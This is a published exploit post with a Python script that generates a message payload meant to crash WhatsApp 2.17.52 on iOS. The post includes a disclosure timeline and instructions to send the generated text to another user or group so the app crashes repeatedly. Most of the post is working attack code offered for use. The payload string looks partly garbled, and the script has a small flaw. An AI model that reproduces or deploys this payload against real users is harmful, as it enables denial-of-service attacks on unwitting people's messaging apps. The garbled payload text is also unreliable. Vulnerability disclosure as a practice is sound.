WhatsApp 2.17.52 Memory Corruption
Posted on 01 November 2017
#!/usr/bin/env python # -*- coding: utf-8 -*- # Found this and more exploits on my open source security project: http://www.exploitpack.com # Exploit Author: Juan Sacco <juan.sacco@kpn.com> at KPN Red Team - http://www.kpn.com # Date and time of release: 11 October 2017 # # Tested on: iPhone 5/6s iOS 10.3.3 and 11 # # Description: # WhatsApp 2.17.52 and prior is prone to a remote memory corruption. # This type of attacks are possible if the program uses memory inefficiently and does not impose limits on the amount of state used when necessary. # # Impact: # Resource exhaustion attacks exploit a design deficiency. An attacker could exploit this vulnerability to remotely corrupt the memory of the application forcing an uhandled exception # in the context of the application that could potentially result in a denial-of-service condition and/or remote memory corruption. # # Warning note: # Once a user receives the offending message it will automatically crash the application and if its restarted it will crash again until the message its manually removed from the user's history. # # Timeline: # 09/13/2017 - Research started # 09/13/2017 - First proof of concept # 09/15/2017 - Reported to Whatsapp # 09/20/2017 - Report Triaged by Facebook # 11/01/2017 - Facebook never replied back with a status fix # 11/01/2017 - Disclosure as zero day # Vendor homepage: http://www.whatsapp.com import sys reload(sys) def whatsapp(filename): sys.setdefaultencoding("utf-8") payload = u'O" O(c) Oa O<< O! O O(r) O- Odeg O+- O2 O3 O' Ou OP O* O, O1 Oo U U U U U U' * 1337 sutf8 = payload.encode('UTF-8') print "[*] Writing to file: " + filename open(filename, 'w').write(payload) print "[*] Done." def howtouse(): print "Usage: whatsapp.py [FILENAME]" print "[*] Mandatory arguments:" print "[-] FILENAME" sys.exit(-1) if __name__ == "__main__": try: print "[*] WhatsApp 2.17.52 iOS - Remote memory corruption by Juan Sacco" print "[*] How to use: Copy the content of the file and send it as a message to another whatsapp user or group" whatsapp(sys.argv[1]) except IndexError: howtouse()